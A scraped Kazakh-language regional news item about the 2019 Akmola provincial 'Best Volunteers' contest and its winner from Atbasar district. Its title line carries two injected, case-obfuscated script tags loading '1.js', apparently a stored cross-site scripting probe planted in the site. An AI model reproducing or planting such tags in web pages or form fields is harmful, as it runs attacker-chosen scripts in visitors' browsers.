«Үздік еріктілер – 2019» облыстық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2019

«Үздік еріктілер – 2019» облыстық байқауы

     Ақмола облысы ішкі саясат басқармасының "Балалар-жасөспірімдер және еріктілер қозғалысын дамыту" Мемлекеттік әлеуметтік тапсырысы аясында "Ақмола облысының "Жас Ұлан" бірыңғай балалар-жасөспірімдер қозғалысы" ҚБ ұйымдастыруымен 15 қарашада Білім басқармасының конференц-залында облыс еріктілерінің Әлеуметтік және шығармашылық белсенділігін арттыру, Қазақстандық патриотизмді тәрбиелеу, волонтерлердің шығармашылық және зияткерлік қабілеттерін дамыту мақсатында алғаш рет "Үздік еріктілер – 2019" облыстық байқауы өтті.

     13 қатысушы арасында "Атбасар ауданының білім бөлімінің жанындағы балалар жасөспірімдер орталығы" МКҚК харизматикалық тәрбиеленушісі Юлия Минец креативті жасұландықтарды қолдау тобымен бірге: Сагандыков Диас, Шульгина София, Мурзалиев Арман, Ржевская Кристина, Дикал Милена, Деревянкова Марина волонтерлік қызметін көрсетті. Юля 4 турды лайықты өтті: 1. эссе, 2. өзін-өзі таныстыру, 3 презентация-есеп және 4. "Мен – волонтермін" бейнеролигі 1 жүлделі орынға ие болды.

Просмотров: 552


Пікір қосу



Деректерді қолтаңбаға қосу